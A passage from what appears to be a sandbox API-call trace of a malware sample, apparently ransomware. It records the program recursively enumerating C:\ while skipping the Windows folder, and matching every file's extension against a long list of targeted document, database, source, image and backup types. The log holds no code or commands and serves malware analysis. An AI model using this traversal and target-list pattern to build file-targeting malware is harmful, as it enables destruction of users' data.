	[0043.581] FindNextFileW (in: hFindFile=0xb430148, lpFindFileData=0xa91f808 | out: lpFindFileData=0xa91f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80471418, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80471418, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Media Renderer", cAlternateFileName="MEDIAR~1")) returned 1
	[0043.581] lstrlenW (lpString="C:\\Program Files\\Windows Media Player\\Media Renderer") returned 52
	[0043.581] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\*", lpFindFileData=0xa91f58c | out: lpFindFileData=0xa91f58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80471418, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80471418, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb430308
	[0043.583] FindNextFileW (in: hFindFile=0xb430308, lpFindFileData=0xa91f58c | out: lpFindFileData=0xa91f58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80471418, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80471418, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0043.583] FindNextFileW (in: hFindFile=0xb430308, lpFindFileData=0xa91f58c | out: lpFindFileData=0xa91f58c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x828f4a85, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0x828f4a85, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x8adeec5d, ftLastWriteTime.dwHighDateTime=0x1c9ea0d, nFileSizeHigh=0x0, nFileSizeLow=0x4d82, dwReserved0=0x0, dwReserved1=0x0, cFileName="avtransport.xml", cAlternateFileName="")) returned 1
	[0043.583] lstrlenW (lpString="avtransport.xml") returned 15
	[0043.583] lstrlenW (lpString=".1cd") returned 4

Thread:
	id = 19
	os_tid = 0x9a0

	[0032.852] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xfffe) returned 0xb400058
	[0032.853] lstrlenW (lpString="C:") returned 2
	[0032.853] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0xaa5fd00 | out: lpFindFileData=0xaa5fd00*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1002f, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x7e5df08
	[0032.853] lstrlenW (lpString="C:\\$Recycle.Bin") returned 15
	[0032.853] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\$Recycle.Bin") returned 1
	[0032.853] lstrlenW (lpString="$Recycle.Bin") returned 12
	[0032.853] lstrcmpiW (lpString1="C:\\Windows", lpString2="$Recycle.Bin") returned 1
	[0032.853] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xfffe) returned 0xb410060
	[0032.854] lstrlenW (lpString="C:\\$Recycle.Bin") returned 15
	[0032.854] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\*", lpFindFileData=0xaa5fa84 | out: lpFindFileData=0xaa5fa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7e5df48
	[0032.854] FindNextFileW (in: hFindFile=0x7e5df48, lpFindFileData=0xaa5fa84 | out: lpFindFileData=0xaa5fa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0032.854] FindNextFileW (in: hFindFile=0x7e5df48, lpFindFileData=0xaa5fa84 | out: lpFindFileData=0xaa5fa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-3388679973-3930757225-3770151564-1000", cAlternateFileName="S-1-5-~1")) returned 1
	[0032.854] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned 62
	[0032.854] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned 1
	[0032.854] lstrlenW (lpString="S-1-5-21-3388679973-3930757225-3770151564-1000") returned 46
	[0032.854] lstrcmpiW (lpString1="C:\\Windows", lpString2="S-1-5-21-3388679973-3930757225-3770151564-1000") returned -1
	[0032.854] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xfffe) returned 0xb420068
	[0032.855] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned 62
	[0032.855] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*", lpFindFileData=0xaa5f808 | out: lpFindFileData=0xaa5f808*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7e5ef90
	[0032.855] FindNextFileW (in: hFindFile=0x7e5ef90, lpFindFileData=0xaa5f808 | out: lpFindFileData=0xaa5f808*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0032.855] FindNextFileW (in: hFindFile=0x7e5ef90, lpFindFileData=0xaa5f808 | out: lpFindFileData=0xaa5f808*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
	[0032.855] lstrlenW (lpString="desktop.ini") returned 11
	[0032.855] lstrlenW (lpString=".1cd") returned 4
	[0032.855] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1
	[0032.855] lstrlenW (lpString=".3ds") returned 4
	[0032.855] lstrcmpiW (lpString1=".3ds", lpString2=".ini") returned -1
	[0032.855] lstrlenW (lpString=".3fr") returned 4
	[0032.855] lstrcmpiW (lpString1=".3fr", lpString2=".ini") returned -1
	[0032.855] lstrlenW (lpString=".3g2") returned 4
	[0032.855] lstrcmpiW (lpString1=".3g2", lpString2=".ini") returned -1
	[0032.855] lstrlenW (lpString=".3gp") returned 4
	[0032.855] lstrcmpiW (lpString1=".3gp", lpString2=".ini") returned -1
	[0032.855] lstrlenW (lpString=".7z") returned 3
	[0032.855] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1
	[0032.855] lstrlenW (lpString=".accda") returned 6
	[0032.855] lstrcmpiW (lpString1=".accda", lpString2="op.ini") returned -1
	[0032.855] lstrlenW (lpString=".accdb") returned 6
	[0032.855] lstrcmpiW (lpString1=".accdb", lpString2="op.ini") returned -1
	[0032.855] lstrlenW (lpString=".accdc") returned 6
	[0032.855] lstrcmpiW (lpString1=".accdc", lpString2="op.ini") returned -1
	[0032.855] lstrlenW (lpString=".accde") returned 6
	[0032.856] lstrcmpiW (lpString1=".accde", lpString2="op.ini") returned -1
	[0032.856] lstrlenW (lpString=".accdt") returned 6
	[0032.856] lstrcmpiW (lpString1=".accdt", lpString2="op.ini") returned -1
	[0032.856] lstrlenW (lpString=".accdw") returned 6
	[0032.856] lstrcmpiW (lpString1=".accdw", lpString2="op.ini") returned -1
	[0032.856] lstrlenW (lpString=".adb") returned 4
	[0032.856] lstrcmpiW (lpString1=".adb", lpString2=".ini") returned -1
	[0032.856] lstrlenW (lpString=".adp") returned 4
	[0032.856] lstrcmpiW (lpString1=".adp", lpString2=".ini") returned -1
	[0032.856] lstrlenW (lpString=".ai") returned 3
	[0032.856] lstrcmpiW (lpString1=".ai", lpString2="ini") returned -1
	[0032.856] lstrlenW (lpString=".ai3") returned 4
	[0032.856] lstrcmpiW (lpString1=".ai3", lpString2=".ini") returned -1
	[0032.856] lstrlenW (lpString=".ai4") returned 4
	[0032.856] lstrcmpiW (lpString1=".ai4", lpString2=".ini") returned -1
	[0032.856] lstrlenW (lpString=".ai5") returned 4
	[0032.856] lstrcmpiW (lpString1=".ai5", lpString2=".ini") returned -1
	[0032.856] lstrlenW (lpString=".ai6") returned 4
	[0032.856] lstrcmpiW (lpString1=".ai6", lpString2=".ini") returned -1
	[0032.856] lstrlenW (lpString=".ai7") returned 4
	[0032.856] lstrcmpiW (lpString1=".ai7", lpString2=".ini") returned -1
	[0032.856] lstrlenW (lpString=".ai8") returned 4
	[0032.856] lstrcmpiW (lpString1=".ai8", lpString2=".ini") returned -1
	[0032.856] lstrlenW (lpString=".anim") returned 5
	[0032.856] lstrcmpiW (lpString1=".anim", lpString2="p.ini") returned -1
	[0032.856] lstrlenW (lpString=".arw") returned 4
	[0032.856] lstrcmpiW (lpString1=".arw", lpString2=".ini") returned -1
	[0032.856] lstrlenW (lpString=".as") returned 3
	[0032.856] lstrcmpiW (lpString1=".as", lpString2="ini") returned -1
	[0032.856] lstrlenW (lpString=".asa") returned 4
	[0032.856] lstrcmpiW (lpString1=".asa", lpString2=".ini") returned -1
	[0032.856] lstrlenW (lpString=".asc") returned 4
	[0032.856] lstrcmpiW (lpString1=".asc", lpString2=".ini") returned -1
	[0032.856] lstrlenW (lpString=".ascx") returned 5
	[0032.856] lstrcmpiW (lpString1=".ascx", lpString2="p.ini") returned -1
	[0032.857] lstrlenW (lpString=".asm") returned 4
	[0032.857] lstrcmpiW (lpString1=".asm", lpString2=".ini") returned -1
	[0032.857] lstrlenW (lpString=".asmx") returned 5
	[0032.857] lstrcmpiW (lpString1=".asmx", lpString2="p.ini") returned -1
	[0032.857] lstrlenW (lpString=".asp") returned 4
	[0032.857] lstrcmpiW (lpString1=".asp", lpString2=".ini") returned -1
	[0032.857] lstrlenW (lpString=".aspx") returned 5
	[0032.857] lstrcmpiW (lpString1=".aspx", lpString2="p.ini") returned -1
	[0032.857] lstrlenW (lpString=".asr") returned 4
	[0032.857] lstrcmpiW (lpString1=".asr", lpString2=".ini") returned -1
	[0032.857] lstrlenW (lpString=".asx") returned 4
	[0032.857] lstrcmpiW (lpString1=".asx", lpString2=".ini") returned -1
	[0032.857] lstrlenW (lpString=".avi") returned 4
	[0032.857] lstrcmpiW (lpString1=".avi", lpString2=".ini") returned -1
	[0032.857] lstrlenW (lpString=".avs") returned 4
	[0032.857] lstrcmpiW (lpString1=".avs", lpString2=".ini") returned -1
	[0032.857] lstrlenW (lpString=".backup") returned 7
	[0032.857] lstrcmpiW (lpString1=".backup", lpString2="top.ini") returned -1
	[0032.857] lstrlenW (lpString=".bak") returned 4
	[0032.857] lstrcmpiW (lpString1=".bak", lpString2=".ini") returned -1
	[0032.857] lstrlenW (lpString=".bay") returned 4
	[0032.857] lstrcmpiW (lpString1=".bay", lpString2=".ini") returned -1
	[0032.857] lstrlenW (lpString=".bd") returned 3
	[0032.857] lstrcmpiW (lpString1=".bd", lpString2="ini") returned -1
	[0032.857] lstrlenW (lpString=".bin") returned 4
	[0032.857] lstrcmpiW (lpString1=".bin", lpString2=".ini") returned -1
	[0032.857] lstrlenW (lpString=".bmp") returned 4
	[0032.857] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1
	[0032.857] lstrlenW (lpString=".bz2") returned 4
	[0032.857] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1
	[0032.857] lstrlenW (lpString=".c") returned 2
	[0032.857] lstrcmpiW (lpString1=".c", lpString2="ni") returned -1
	[0032.857] lstrlenW (lpString=".cdr") returned 4
	[0032.858] lstrcmpiW (lpString1=".cdr", lpString2=".ini") returned -1
	[0032.858] lstrlenW (lpString=".cer") returned 4
	[0032.858] lstrcmpiW (lpString1=".cer", lpString2=".ini") returned -1
	[0032.858] lstrlenW (lpString=".cf") returned 3
	[0032.858] lstrcmpiW (lpString1=".cf", lpString2="ini") returned -1
	[0032.858] lstrlenW (lpString=".cfc") returned 4
	[0032.858] lstrcmpiW (lpString1=".cfc", lpString2=".ini") returned -1
	[0032.858] lstrlenW (lpString=".cfm") returned 4
	[0032.858] lstrcmpiW (lpString1=".cfm", lpString2=".ini") returned -1
	[0032.858] lstrlenW (lpString=".cfml") returned 5
	[0032.858] lstrcmpiW (lpString1=".cfml", lpString2="p.ini") returned -1
	[0032.858] lstrlenW (lpString=".cfu") returned 4
	[0032.858] lstrcmpiW (lpString1=".cfu", lpString2=".ini") returned -1
	[0032.858] lstrlenW (lpString=".chm") returned 4
	[0032.858] lstrcmpiW (lpString1=".chm", lpString2=".ini") returned -1
	[0032.858] lstrlenW (lpString=".cin") returned 4
	[0032.858] lstrcmpiW (lpString1=".cin", lpString2=".ini") returned -1
	[0032.858] lstrlenW (lpString=".class") returned 6
	[0032.858] lstrcmpiW (lpString1=".class", lpString2="op.ini") returned -1
	[0032.858] lstrlenW (lpString=".clx") returned 4
	[0032.858] lstrcmpiW (lpString1=".clx", lpString2=".ini") returned -1
	[0032.858] lstrlenW (lpString=".config") returned 7
	[0032.858] lstrcmpiW (lpString1=".config", lpString2="top.ini") returned -1
	[0032.858] lstrlenW (lpString=".cpp") returned 4
	[0032.858] lstrcmpiW (lpString1=".cpp", lpString2=".ini") returned -1
	[0032.858] lstrlenW (lpString=".cr2") returned 4
	[0032.858] lstrcmpiW (lpString1=".cr2", lpString2=".ini") returned -1
	[0032.858] lstrlenW (lpString=".crt") returned 4
	[0032.858] lstrcmpiW (lpString1=".crt", lpString2=".ini") returned -1
	[0032.858] lstrlenW (lpString=".crw") returned 4
	[0032.858] lstrcmpiW (lpString1=".crw", lpString2=".ini") returned -1
	[0032.858] lstrlenW (lpString=".cs") returned 3
	[0032.858] lstrcmpiW (lpString1=".cs", lpString2="ini") returned -1
	[0032.858] lstrlenW (lpString=".css") returned 4
	[0032.859] lstrcmpiW (lpString1=".css", lpString2=".ini") returned -1
	[0032.859] lstrlenW (lpString=".csv") returned 4
	[0032.859] lstrcmpiW (lpString1=".csv", lpString2=".ini") returned -1
	[0032.859] lstrlenW (lpString=".cub") returned 4
	[0032.859] lstrcmpiW (lpString1=".cub", lpString2=".ini") returned -1
	[0032.859] lstrlenW (lpString=".dae") returned 4
	[0032.859] lstrcmpiW (lpString1=".dae", lpString2=".ini") returned -1
	[0032.859] lstrlenW (lpString=".dat") returned 4
	[0032.859] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1
	[0032.859] lstrlenW (lpString=".db") returned 3
	[0032.859] lstrcmpiW (lpString1=".db", lpString2="ini") returned -1
	[0032.859] lstrlenW (lpString=".dbf") returned 4
	[0032.859] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1
	[0032.859] lstrlenW (lpString=".dbx") returned 4
	[0032.859] lstrcmpiW (lpString1=".dbx", lpString2=".ini") returned -1
	[0032.859] lstrlenW (lpString=".dc3") returned 4
	[0032.859] lstrcmpiW (lpString1=".dc3", lpString2=".ini") returned -1
	[0032.859] lstrlenW (lpString=".dcm") returned 4
	[0032.859] lstrcmpiW (lpString1=".dcm", lpString2=".ini") returned -1
	[0032.859] lstrlenW (lpString=".dcr") returned 4
	[0032.859] lstrcmpiW (lpString1=".dcr", lpString2=".ini") returned -1
	[0032.859] lstrlenW (lpString=".der") returned 4
	[0032.859] lstrcmpiW (lpString1=".der", lpString2=".ini") returned -1
	[0032.859] lstrlenW (lpString=".dib") returned 4
	[0032.859] lstrcmpiW (lpString1=".dib", lpString2=".ini") returned -1
	[0032.859] lstrlenW (lpString=".dic") returned 4
	[0032.859] lstrcmpiW (lpString1=".dic", lpString2=".ini") returned -1
	[0032.859] lstrlenW (lpString=".dif") returned 4
	[0032.859] lstrcmpiW (lpString1=".dif", lpString2=".ini") returned -1
	[0032.859] lstrlenW (lpString=".divx") returned 5
	[0032.859] lstrcmpiW (lpString1=".divx", lpString2="p.ini") returned -1
	[0032.859] lstrlenW (lpString=".djvu") returned 5
	[0032.859] lstrcmpiW (lpString1=".djvu", lpString2="p.ini") returned -1
	[0032.860] lstrlenW (lpString=".dng") returned 4
	[0032.860] lstrcmpiW (lpString1=".dng", lpString2=".ini") returned -1
	[0032.860] lstrlenW (lpString=".doc") returned 4
	[0032.860] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1
	[0032.860] lstrlenW (lpString=".docm") returned 5
	[0032.860] lstrcmpiW (lpString1=".docm", lpString2="p.ini") returned -1
	[0032.860] lstrlenW (lpString=".docx") returned 5
	[0032.860] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1
	[0032.860] lstrlenW (lpString=".dot") returned 4
	[0032.860] lstrcmpiW (lpString1=".dot", lpString2=".ini") returned -1
	[0032.860] lstrlenW (lpString=".dotm") returned 5
	[0032.860] lstrcmpiW (lpString1=".dotm", lpString2="p.ini") returned -1
	[0032.860] lstrlenW (lpString=".dotx") returned 5
	[0032.860] lstrcmpiW (lpString1=".dotx", lpString2="p.ini") returned -1
	[0032.860] lstrlenW (lpString=".dpx") returned 4
	[0032.860] lstrcmpiW (lpString1=".dpx", lpString2=".ini") returned -1
	[0032.860] lstrlenW (lpString=".dqy") returned 4
	[0032.860] lstrcmpiW (lpString1=".dqy", lpString2=".ini") returned -1
	[0032.860] lstrlenW (lpString=".dsn") returned 4
	[0032.860] lstrcmpiW (lpString1=".dsn", lpString2=".ini") returned -1
	[0032.860] lstrlenW (lpString=".dt") returned 3
	[0032.860] lstrcmpiW (lpString1=".dt", lpString2="ini") returned -1
	[0032.860] lstrlenW (lpString=".dtd") returned 4
	[0032.860] lstrcmpiW (lpString1=".dtd", lpString2=".ini") returned -1
	[0032.860] lstrlenW (lpString=".dwg") returned 4
	[0032.861] lstrcmpiW (lpString1=".dwg", lpString2=".ini") returned -1
	[0032.861] lstrlenW (lpString=".dwt") returned 4
	[0032.861] lstrcmpiW (lpString1=".dwt", lpString2=".ini") returned -1
	[0032.861] lstrlenW (lpString=".dx") returned 3
	[0032.861] lstrcmpiW (lpString1=".dx", lpString2="ini") returned -1
	[0032.861] lstrlenW (lpString=".dxf") returned 4
	[0032.861] lstrcmpiW (lpString1=".dxf", lpString2=".ini") returned -1
	[0032.861] lstrlenW (lpString=".edml") returned 5
	[0032.861] lstrcmpiW (lpString1=".edml", lpString2="p.ini") returned -1
	[0032.861] lstrlenW (lpString=".efd") returned 4
	[0032.861] lstrcmpiW (lpString1=".efd", lpString2=".ini") returned -1
	[0032.861] lstrlenW (lpString=".elf") returned 4
	[0032.861] lstrcmpiW (lpString1=".elf", lpString2=".ini") returned -1
	[0032.861] lstrlenW (lpString=".emf") returned 4
	[0032.861] lstrcmpiW (lpString1=".emf", lpString2=".ini") returned -1
	[0032.861] lstrlenW (lpString=".emz") returned 4
	[0032.861] lstrcmpiW (lpString1=".emz", lpString2=".ini") returned -1
	[0032.861] lstrlenW (lpString=".epf") returned 4
	[0032.861] lstrcmpiW (lpString1=".epf", lpString2=".ini") returned -1
	[0032.861] lstrlenW (lpString=".eps") returned 4
	[0032.861] lstrcmpiW (lpString1=".eps", lpString2=".ini") returned -1
	[0032.861] lstrlenW (lpString=".epsf") returned 5
	[0032.861] lstrcmpiW (lpString1=".epsf", lpString2="p.ini") returned -1
	[0032.861] lstrlenW (lpString=".epsp") returned 5
	[0032.861] lstrcmpiW (lpString1=".epsp", lpString2="p.ini") returned -1
	[0032.861] lstrlenW (lpString=".erf") returned 4
	[0032.861] lstrcmpiW (lpString1=".erf", lpString2=".ini") returned -1
	[0032.861] lstrlenW (lpString=".exr") returned 4
	[0032.861] lstrcmpiW (lpString1=".exr", lpString2=".ini") returned -1
	[0032.861] lstrlenW (lpString=".f4v") returned 4
	[0032.861] lstrcmpiW (lpString1=".f4v", lpString2=".ini") returned -1
	[0032.861] lstrlenW (lpString=".fido") returned 5
	[0032.861] lstrcmpiW (lpString1=".fido", lpString2="p.ini") returned -1
	[0032.862] lstrlenW (lpString=".flm") returned 4
	[0032.862] lstrcmpiW (lpString1=".flm", lpString2=".ini") returned -1
	[0032.862] lstrlenW (lpString=".flv") returned 4
	[0032.862] lstrcmpiW (lpString1=".flv", lpString2=".ini") returned -1
	[0032.862] lstrlenW (lpString=".frm") returned 4
	[0032.862] lstrcmpiW (lpString1=".frm", lpString2=".ini") returned -1
	[0032.862] lstrlenW (lpString=".fxg") returned 4
	[0032.862] lstrcmpiW (lpString1=".fxg", lpString2=".ini") returned -1
	[0032.862] lstrlenW (lpString=".geo") returned 4
	[0032.862] lstrcmpiW (lpString1=".geo", lpString2=".ini") returned -1
	[0032.862] lstrlenW (lpString=".gif") returned 4
	[0032.862] lstrcmpiW (lpString1=".gif", lpString2=".ini") returned -1
	[0032.862] lstrlenW (lpString=".grs") returned 4
	[0032.862] lstrcmpiW (lpString1=".grs", lpString2=".ini") returned -1
	[0032.862] lstrlenW (lpString=".gz") returned 3
	[0032.862] lstrcmpiW (lpString1=".gz", lpString2="ini") returned -1
	[0032.862] lstrlenW (lpString=".h") returned 2
	[0032.862] lstrcmpiW (lpString1=".h", lpString2="ni") returned -1
	[0032.862] lstrlenW (lpString=".hdr") returned 4
	[0032.862] lstrcmpiW (lpString1=".hdr", lpString2=".ini") returned -1
	[0032.862] lstrlenW (lpString=".hpp") returned 4
	[0032.862] lstrcmpiW (lpString1=".hpp", lpString2=".ini") returned -1
	[0032.862] lstrlenW (lpString=".hta") returned 4
	[0032.862] lstrcmpiW (lpString1=".hta", lpString2=".ini") returned -1
	[0032.862] lstrlenW (lpString=".htc") returned 4
	[0032.862] lstrcmpiW (lpString1=".htc", lpString2=".ini") returned -1
	[0032.862] lstrlenW (lpString=".htm") returned 4
	[0032.862] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1
	[0032.862] lstrlenW (lpString=".html") returned 5
	[0032.862] lstrcmpiW (lpString1=".html", lpString2="p.ini") returned -1
	[0032.862] lstrlenW (lpString=".icb") returned 4
	[0032.862] lstrcmpiW (lpString1=".icb", lpString2=".ini") returned -1
	[0032.862] lstrlenW (lpString=".ics") returned 4
	[0032.862] lstrcmpiW (lpString1=".ics", lpString2=".ini") returned -1
	[0032.863] lstrlenW (lpString=".iff") returned 4
	[0032.863] lstrcmpiW (lpString1=".iff", lpString2=".ini") returned -1
	[0032.863] lstrlenW (lpString=".inc") returned 4
	[0032.863] lstrcmpiW (lpString1=".inc", lpString2=".ini") returned -1
	[0032.863] lstrlenW (lpString=".indd") returned 5
	[0032.863] lstrcmpiW (lpString1=".indd", lpString2="p.ini") returned -1
	[0032.863] lstrlenW (lpString=".ini") returned 4
	[0032.863] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0
	[0032.863] FindNextFileW (in: hFindFile=0x7e5ef90, lpFindFileData=0xaa5f808 | out: lpFindFileData=0xaa5f808*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0
	[0032.863] FindClose (in: hFindFile=0x7e5ef90 | out: hFindFile=0x7e5ef90) returned 1
	[0032.863] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb420068 | out: hHeap=0x7d60000) returned 1
	[0032.863] FindNextFileW (in: hFindFile=0x7e5df48, lpFindFileData=0xaa5fa84 | out: lpFindFileData=0xaa5fa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-3388679973-3930757225-3770151564-1000", cAlternateFileName="S-1-5-~1")) returned 0
	[0032.863] FindClose (in: hFindFile=0x7e5df48 | out: hFindFile=0x7e5df48) returned 1
	[0032.863] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb410060 | out: hHeap=0x7d60000) returned 1
	[0032.863] FindNextFileW (in: hFindFile=0x7e5df08, lpFindFileData=0xaa5fd00 | out: lpFindFileData=0xaa5fd00*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1002f, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1
	[0032.863] lstrlenW (lpString="C:\\Boot") returned 7
	[0032.863] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\Boot") returned 1
	[0032.863] lstrlenW (lpString="Boot") returned 4
	[0032.863] lstrcmpiW (lpString1="C:\\Windows", lpString2="Boot") returned 1
	[0032.863] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xfffe) returned 0xb410060
	[0032.863] lstrlenW (lpString="C:\\Boot") returned 7
	[0032.863] FindFirstFileW (in: lpFileName="C:\\Boot\\*", lpFindFileData=0xaa5fa84 | out: lpFindFileData=0xaa5fa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7e5ef50
